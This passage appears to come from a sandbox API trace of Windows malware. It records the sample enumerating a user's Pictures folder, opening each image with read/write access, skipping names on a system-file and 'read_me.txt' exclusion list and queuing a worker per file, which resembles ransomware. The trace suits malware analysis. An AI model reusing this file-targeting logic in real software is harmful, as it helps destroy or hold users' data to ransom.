HALPmcxz\\Pictures\\IeUcz.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ieucz.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9f0 [0076.243] StrStrW (lpFirst="ieucz.bmp", lpSrch="read_me.txt") returned 0x0 [0076.243] StrStrW (lpFirst="ieucz.bmp", lpSrch="autoexec.bat") returned 0x0 [0076.243] StrStrW (lpFirst="ieucz.bmp", lpSrch="desktop.ini") returned 0x0 [0076.243] StrStrW (lpFirst="ieucz.bmp", lpSrch="autorun.inf") returned 0x0 [0076.243] StrStrW (lpFirst="ieucz.bmp", lpSrch="ntuser.dat") returned 0x0 [0076.243] StrStrW (lpFirst="ieucz.bmp", lpSrch="iconcache.db") returned 0x0 [0076.243] StrStrW (lpFirst="ieucz.bmp", lpSrch="bootsect.bak") returned 0x0 [0076.243] StrStrW (lpFirst="ieucz.bmp", lpSrch="boot.ini") returned 0x0 [0076.243] StrStrW (lpFirst="ieucz.bmp", lpSrch="ntuser.dat.log") returned 0x0 [0076.243] StrStrW (lpFirst="ieucz.bmp", lpSrch="thumbs.db") returned 0x0 [0076.243] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 158 [0076.243] QueueUserWorkItem (Function=0x404e00, Context=0x9f0, Flags=0x0) returned 1 [0076.243] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe4190, ftCreationTime.dwHighDateTime=0x1d4cf76, ftLastAccessTime.dwLowDateTime=0x97973a70, ftLastAccessTime.dwHighDateTime=0x1d4d372, ftLastWriteTime.dwLowDateTime=0x97973a70, ftLastWriteTime.dwHighDateTime=0x1d4d372, nFileSizeHigh=0x0, nFileSizeLow=0x4f00, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="iIRcF_.jpg", cAlternateFileName="")) returned 1 [0076.243] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iIRcF_.jpg") returned 53 [0076.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iIRcF_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iircf_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9f4 [0076.244] StrStrW (lpFirst="iircf_.jpg", lpSrch="read_me.txt") returned 0x0 [0076.244] StrStrW (lpFirst="iircf_.jpg", lpSrch="autoexec.bat") returned 0x0 [0076.244] StrStrW (lpFirst="iircf_.jpg", lpSrch="desktop.ini") returned 0x0 [0076.244] StrStrW (lpFirst="iircf_.jpg", lpSrch="autorun.inf") returned 0x0 [0076.244] StrStrW (lpFirst="iircf_.jpg", lpSrch="ntuser.dat") returned 0x0 [0076.244] StrStrW (lpFirst="iircf_.jpg", lpSrch="iconcache.db") returned 0x0 [0076.244] StrStrW (lpFirst="iircf_.jpg", lpSrch="bootsect.bak") returned 0x0 [0076.244] StrStrW (lpFirst="iircf_.jpg", lpSrch="boot.ini") returned 0x0 [0076.244] StrStrW (lpFirst="iircf_.jpg", lpSrch="ntuser.dat.log") returned 0x0 [0076.244] StrStrW (lpFirst="iircf_.jpg", lpSrch="thumbs.db") returned 0x0 [0076.244] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 159 [0076.244] QueueUserWorkItem (Function=0x404e00, Context=0x9f4, Flags=0x0) returned 1 [0076.244] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5efb1ed0, ftCreationTime.dwHighDateTime=0x1d4c91c, ftLastAccessTime.dwLowDateTime=0x6d052b80, ftLastAccessTime.dwHighDateTime=0x1d4ce83, ftLastWriteTime.dwLowDateTime=0x6d052b80, ftLastWriteTime.dwHighDateTime=0x1d4ce83, nFileSizeHigh=0x0, nFileSizeLow=0x2226, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="jqGW9rBdkPhNCoa8pfh.png", cAlternateFileName="JQGW9R~1.PNG")) returned 1 [0076.244] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jqGW9rBdkPhNCoa8pfh.png") returned 66 [0076.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jqGW9rBdkPhNCoa8pfh.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jqgw9rbdkphncoa8pfh.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9f8 [0076.244] StrStrW (lpFirst="jqgw9rbdkphncoa8pfh.png", lpSrch="read_me.txt") returned 0x0 [0076.244] StrStrW (lpFirst="jqgw9rbdkphncoa8pfh.png", lpSrch="autoexec.bat") returned 0x0 [0076.244] StrStrW (lpFirst="jqgw9rbdkphncoa8pfh.png", lpSrch="desktop.ini") returned 0x0 [0076.244] StrStrW (lpFirst="jqgw9rbdkphncoa8pfh.png", lpSrch="autorun.inf") returned 0x0 [0076.244] StrStrW (lpFirst="jqgw9rbdkphncoa8pfh.png", lpSrch="ntuser.dat") returned 0x0 [0076.244] StrStrW (lpFirst="jqgw9rbdkphncoa8pfh.png", lpSrch="iconcache.db") returned 0x0 [0076.244] StrStrW (lpFirst="jqgw9rbdkphncoa8pfh.png", lpSrch="bootsect.bak") returned 0x0 [0076.244] StrStrW (lpFirst="jqgw9rbdkphncoa8pfh.png", lpSrch="boot.ini") returned 0x0 [0076.245] StrStrW (lpFirst="jqgw9rbdkphncoa8pfh.png", lpSrch="ntuser.dat.log") returned 0x0 [0076.245] StrStrW (lpFirst="jqgw9rbdkphncoa8pfh.png", lpSrch="thumbs.db") returned 0x0 [0076.245] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 160 [0076.245] QueueUserWorkItem (Function=0x404e00, Context=0x9f8, Flags=0x0) returned 1 [0076.245] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9885ed0, ftCreationTime.dwHighDateTime=0x1d4d48c, ftLastAccessTime.dwLowDateTime=0x25929550, ftLastAccessTime.dwHighDateTime=0x1d4ce86, ftLastWriteTime.dwLowDateTime=0x25929550, ftLastWriteTime.dwHighDateTime=0x1d4ce86, nFileSizeHigh=0x0, nFileSizeLow=0x146f9, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="j_wmVI32CgzzP5.bmp", cAlternateFileName="J_WMVI~1.BMP")) returned 1 [0076.245] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j_wmVI32CgzzP5.bmp") returned 61 [0076.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j_wmVI32CgzzP5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j_wmvi32cgzzp5.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9fc [0076.245] StrStrW (lpFirst="j_wmvi32cgzzp5.bmp", lpSrch="read_me.txt") returned 0x0 [0076.245] StrStrW (lpFirst="j_wmvi32cgzzp5.bmp", lpSrch="autoexec.bat") returned 0x0 [0076.245] StrStrW (lpFirst="j_wmvi32cgzzp5.bmp", lpSrch="desktop.ini") returned 0x0 [0076.245] StrStrW (lpFirst="j_wmvi32cgzzp5.bmp", lpSrch="autorun.inf") returned 0x0 [0076.245] StrStrW (lpFirst="j_wmvi32cgzzp5.bmp", lpSrch="ntuser.dat") returned 0x0 [0076.245] StrStrW (lpFirst="j_wmvi32cgzzp5.bmp", lpSrch="iconcache.db") returned 0x0 [0076.245] StrStrW (lpFirst="j_wmvi32cgzzp5.bmp", lpSrch="bootsect.bak") returned 0x0 [0076.245] StrStrW (lpFirst="j_wmvi32cgzzp5.bmp", lpSrch="boot.ini") returned 0x0 [0076.245] StrStrW (lpFirst="j_wmvi32cgzzp5.bmp", lpSrch="ntuser.dat.log") returned 0x0 [0076.245] StrStrW (lpFirst="j_wmvi32cgzzp5.bmp", lpSrch="thumbs.db") returned 0x0 [0076.245] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 161 [0076.245] QueueUserWorkItem (Function=0x404e00, Context=0x9fc, Flags=0x0) returned 1 [0076.245] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9a21150, ftCreationTime.dwHighDateTime=0x1d4cefa, ftLastAccessTime.dwLowDateTime=0x64172600, ftLastAccessTime.dwHighDateTime=0x1d4ca9a, ftLastWriteTime.dwLowDateTime=0x64172600, ftLastWriteTime.dwHighDateTime=0x1d4ca9a, nFileSizeHigh=0x0, nFileSizeLow=0xcd3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="k3qQOB5vZaWyPRMgI7n.bmp", cAlternateFileName="K3QQOB~1.BMP")) returned 1 [0076.245] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k3qQOB5vZaWyPRMgI7n.bmp") returned 66 [0076.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k3qQOB5vZaWyPRMgI7n.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k3qqob5vzawyprmgi7n.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa00 [0076.245] StrStrW (lpFirst="k3qqob5vzawyprmgi7n.bmp", lpSrch="read_me.txt") returned 0x0 [0076.245] StrStrW (lpFirst="k3qqob5vzawyprmgi7n.bmp", lpSrch="autoexec.bat") returned 0x0 [0076.246] StrStrW (lpFirst="k3qqob5vzawyprmgi7n.bmp", lpSrch="desktop.ini") returned 0x0 [0076.246] StrStrW (lpFirst="k3qqob5vzawyprmgi7n.bmp", lpSrch="autorun.inf") returned 0x0 [0076.246] StrStrW (lpFirst="k3qqob5vzawyprmgi7n.bmp", lpSrch="ntuser.dat") returned 0x0 [0076.246] StrStrW (lpFirst="k3qqob5vzawyprmgi7n.bmp", lpSrch="iconcache.db") returned 0x0 [0076.246] StrStrW (lpFirst="k3qqob5vzawyprmgi7n.bmp", lpSrch="bootsect.bak") returned 0x0 [0076.246] StrStrW (lpFirst="k3qqob5vzawyprmgi7n.bmp", lpSrch="boot.ini") returned 0x0 [0076.246] StrStrW (lpFirst="k3qqob5vzawyprmgi7n.bmp", lpSrch="ntuser.dat.log") returned 0x0 [0076.246] StrStrW (lpFirst="k3qqob5vzawyprmgi7n.bmp", lpSrch="thumbs.db") returned 0x0 [0076.246] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 162 [0076.246] QueueUserWorkItem (Function=0x404e00, Context=0xa00, Flags=0x0) returned 1 [0076.246] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa06fb000, ftCreationTime.dwHighDateTime=0x1d4d485, ftLastAccessTime.dwLowDateTime=0x3eeb5210, ftLastAccessTime.dwHighDateTime=0x1d4c636, ftLastWriteTime.dwLowDateTime=0x3eeb5210, ftLastWriteTime.dwHighDateTime=0x1d4c636, nFileSizeHigh=0x0, nFileSizeLow=0x16c53, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="LmYaBDzuYd2.png", cAlternateFileName="LMYABD~1.PNG")) returned 1 [0076.246] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LmYaBDzuYd2.png") returned 58 [0076.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LmYaBDzuYd2.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lmyabdzuyd2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa04 [0076.246] StrStrW (lpFirst="lmyabdzuyd2.png", lpSrch="read_me.txt") returned 0x0 [0076.246] StrStrW (lpFirst="lmyabdzuyd2.png", lpSrch="autoexec.bat") returned 0x0 [0076.246] StrStrW (lpFirst="lmyabdzuyd2.png", lpSrch="desktop.ini") returned 0x0 [0076.246] StrStrW (lpFirst="lmyabdzuyd2.png", lpSrch="autorun.inf") returned 0x0 [0076.246] StrStrW (lpFirst="lmyabdzuyd2.png", lpSrch="ntuser.dat") returned 0x0 [0076.246] StrStrW (lpFirst="lmyabdzuyd2.png", lpSrch="iconcache.db") returned 0x0 [0076.246] StrStrW (lpFirst="lmyabdzuyd2.png", lpSrch="bootsect.bak") returned 0x0 [0076.246] StrStrW (lpFirst="lmyabdzuyd2.png", lpSrch="boot.ini") returned 0x0 [0076.246] StrStrW (lpFirst="lmyabdzuyd2.png", lpSrch="ntuser.dat.log") returned 0x0 [0076.246] StrStrW (lpFirst="lmyabdzuyd2.png", lpSrch="thumbs.db") returned 0x0 [0076.246] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 163 [0076.247] QueueUserWorkItem (Function=0x404e00, Context=0xa04, Flags=0x0) returned 1 [0076.247] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73390600, ftCreationTime.dwHighDateTime=0x1d4ccb9, ftLastAccessTime.dwLowDateTime=0x406c7c40, ftLastAccessTime.dwHighDateTime=0x1d4cf28, ftLastWriteTime.dwLowDateTime=0x406c7c40, ftLastWriteTime.dwHighDateTime=0x1d4cf28, nFileSizeHigh=0x0, nFileSizeLow=0x18a15, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="NWEWuTjUbC.bmp", cAlternateFileName="NWEWUT~1.BMP")) returned 1 [0076.247] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NWEWuTjUbC.bmp") returned 57 [0076.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NWEWuTjUbC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nwewutjubc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa08 [0076.247] StrStrW (lpFirst="nwewutjubc.bmp", lpSrch="read_me.txt") returned 0x0 [0076.247] StrStrW (lpFirst="nwewutjubc.bmp", lpSrch="autoexec.bat") returned 0x0 [0076.247] StrStrW (lpFirst="nwewutjubc.bmp", lpSrch="desktop.ini") returned 0x0 [0076.247] StrStrW (lpFirst="nwewutjubc.bmp", lpSrch="autorun.inf") returned 0x0 [0076.247] StrStrW (lpFirst="nwewutjubc.bmp", lpSrch="ntuser.dat") returned 0x0 [0076.247] StrStrW (lpFirst="nwewutjubc.bmp", lpSrch="iconcache.db") returned 0x0 [0076.247] StrStrW (lpFirst="nwewutjubc.bmp", lpSrch="bootsect.bak") returned 0x0 [0076.247] StrStrW (lpFirst="nwewutjubc.bmp", lpSrch="boot.ini") returned 0x0 [0076.247] StrStrW (lpFirst="nwewutjubc.bmp", lpSrch="ntuser.dat.log") returned 0x0 [0076.247] StrStrW (lpFirst="nwewutjubc.bmp", lpSrch="thumbs.db") returned 0x0 [0076.247] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 164 [0076.247] QueueUserWorkItem (Function=0x404e00, Context=0xa08, Flags=0x0) returned 1 [0076.247] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb813a00, ftCreationTime.dwHighDateTime=0x1d4d0c0, ftLastAccessTime.dwLowDateTime=0x661a1ce0, ftLastAccessTime.dwHighDateTime=0x1d4d559, ftLastWriteTime.dwLowDateTime=0x661a1ce0, ftLastWriteTime.dwHighDateTime=0x1d4d559, nFileSizeHigh=0x0, nFileSizeLow=0xd290, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="OGgxKmIG6X6nh1pvhI.jpg", cAlternateFileName="OGGXKM~1.JPG")) returned 1 [0076.247] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OGgxKmIG6X6nh1pvhI.jpg") returned 65 [0076.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OGgxKmIG6X6nh1pvhI.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oggxkmig6x6nh1pvhi.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0c [0076.247] StrStrW (lpFirst="oggxkmig6x6nh1pvhi.jpg", lpSrch="read_me.txt") returned 0x0 [0076.247] StrStrW (lpFirst="oggxkmig6x6nh1pvhi.jpg", lpSrch="autoexec.bat") returned 0x0 [0076.247] StrStrW (lpFirst="oggxkmig6x6nh1pvhi.jpg", lpSrch="desktop.ini") returned 0x0 [0076.247] StrStrW (lpFirst="oggxkmig6x6nh1pvhi.jpg", lpSrch="autorun.inf") returned 0x0 [0076.248] StrStrW (lpFirst="oggxkmig6x6nh1pvhi.jpg", lpSrch="ntuser.dat") returned 0x0 [0076.248] StrStrW (lpFirst="oggxkmig6x6nh1pvhi.jpg", lpSrch="iconcache.db") returned 0x0 [0076.248] StrStrW (lpFirst="oggxkmig6x6nh1pvhi.jpg", lpSrch="bootsect.bak") returned 0x0 [0076.248] StrStrW (lpFirst="oggxkmig6x6nh1pvhi.jpg", lpSrch="boot.ini") returned 0x0 [0076.248] StrStrW (lpFirst="oggxkmig6x6nh1pvhi.jpg", lpSrch="ntuser.dat.log") returned 0x0 [0076.248] StrStrW (lpFirst="oggxkmig6x6nh1pvhi.jpg", lpSrch="thumbs.db") returned 0x0 [0076.248] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 165 [0076.248] QueueUserWorkItem (Function=0x404e00, Context=0xa0c, Flags=0x0) returned 1 [0076.248] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8dcd5d0, ftCreationTime.dwHighDateTime=0x1d4cf7f, ftLastAccessTime.dwLowDateTime=0x70b17cb0, ftLastAccessTime.dwHighDateTime=0x1d4ca88, ftLastWriteTime.dwLowDateTime=0x70b17cb0, ftLastWriteTime.dwHighDateTime=0x1d4ca88, nFileSizeHigh=0x0, nFileSizeLow=0x18fd0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="ouwd6S7yNy.jpg", cAlternateFileName="OUWD6S~1.JPG")) returned 1 [0076.248] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ouwd6S7yNy.jpg") returned 57 [0076.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ouwd6S7yNy.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ouwd6s7yny.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa10 [0076.248] StrStrW (lpFirst="ouwd6s7yny.jpg", lpSrch="read_me.txt") returned 0x0 [0076.248] StrStrW (lpFirst="ouwd6s7yny.jpg", lpSrch="autoexec.bat") returned 0x0 [0076.248] StrStrW (lpFirst="ouwd6s7yny.jpg", lpSrch="desktop.ini") returned 0x0 [0076.248] StrStrW (lpFirst="ouwd6s7yny.jpg", lpSrch="autorun.inf") returned 0x0 [0076.248] StrStrW (lpFirst="ouwd6s7yny.jpg", lpSrch="ntuser.dat") returned 0x0 [0076.248] StrStrW (lpFirst="ouwd6s7yny.jpg", lpSrch="iconcache.db") returned 0x0 [0076.248] StrStrW (lpFirst="ouwd6s7yny.jpg", lpSrch="bootsect.bak") returned 0x0 [0076.248] StrStrW (lpFirst="ouwd6s7yny.jpg", lpSrch="boot.ini") returned 0x0 [0076.248] StrStrW (lpFirst="ouwd6s7yny.jpg", lpSrch="ntuser.dat.log") returned 0x0 [0076.248] StrStrW (lpFirst="ouwd6s7yny.jpg", lpSrch="thumbs.db") returned 0x0 [0076.248] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 166 [0076.248] QueueUserWorkItem (Function=0x404e00, Context=0xa10, Flags=0x0) returned 1 [0076.248] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36b3790, ftCreationTime.dwHighDateTime=0x1d4d226, ftLastAccessTime.dwLowDateTime=0x5bff7820, ftLastAccessTime.dwHighDateTime=0x1d4c976, ftLastWriteTime.dwLowDateTime=0x5bff7820, ftLastWriteTime.dwHighDateTime=0x1d4c976, nFileSizeHigh=0x0, nFileSizeLow=0x154ea, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="POwpC.gif", cAlternateFileName="")) returned 1 [0076.248] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\POwpC.gif") returned 52 [0076.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\POwpC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\powpc.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa14 [0076.249] StrStrW (lpFirst="powpc.gif", lpSrch="read_me.txt") returned 0x0 [0076.249] StrStrW (lpFirst="powpc.gif", lpSrch="autoexec.bat") returned 0x0 [0076.249] StrStrW (lpFirst="powpc.gif", lpSrch="desktop.ini") returned 0x0 [0076.249] StrStrW (lpFirst="powpc.gif", lpSrch="autorun.inf") returned 0x0 [0076.249] StrStrW (lpFirst="powpc.gif", lpSrch="ntuser.dat") returned 0x0 [0076.249] StrStrW (lpFirst="powpc.gif", lpSrch="iconcache.db") returned 0x0 [0076.249] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 167 [0076.249] QueueUserWorkItem (Function=0x404e00, Context=0xa14, Flags=0x0) returned 1 [0076.249] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x452ca9d0, ftCreationTime.dwHighDateTime=0x1d4c93d, ftLastAccessTime.dwLowDateTime=0xf6ed5f00, ftLastAccessTime.dwHighDateTime=0x1d4c95d, ftLastWriteTime.dwLowDateTime=0xf6ed5f00, ftLastWriteTime.dwHighDateTime=0x1d4c95d, nFileSizeHigh=0x0, nFileSizeLow=0x8d78, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="RBOkJ4bIa.png", cAlternateFileName="RBOKJ4~1.PNG")) returned 1 [0076.249] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RBOkJ4bIa.png") returned 56 [0076.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RBOkJ4bIa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rbokj4bia.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa18 [0076.249] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 168 [0076.249] QueueUserWorkItem (Function=0x404e00, Context=0xa18, Flags=0x0) returned 1 [0076.249] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24822120, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.249] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\read_me.txt") returned 54 [0076.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa1c [0076.250] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ss4Yiq.jpg") returned 53 [0076.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ss4Yiq.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ss4yiq.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa1c [0076.251] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 169 [0076.251] QueueUserWorkItem (Function=0x404e00, Context=0xa1c, Flags=0x0) returned 1 [0076.251] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6d62a10, ftCreationTime.dwHighDateTime=0x1d4d395, ftLastAccessTime.dwLowDateTime=0x4410a670, ftLastAccessTime.dwHighDateTime=0x1d4ca85, ftLastWriteTime.dwLowDateTime=0x4410a670, ftLastWriteTime.dwHighDateTime=0x1d4ca85, nFileSizeHigh=0x0, nFileSizeLow=0xe0fb, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="v2lT.gif", cAlternateFileName="")) returned 1 [0076.251] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v2lT.gif") returned 51 [0076.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v2lT.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v2lt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa20 [0076.251] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 170 [0076.251] QueueUserWorkItem (Function=0x404e00, Context=0xa20, Flags=0x0) returned 1 [0076.251] FindNextFileW 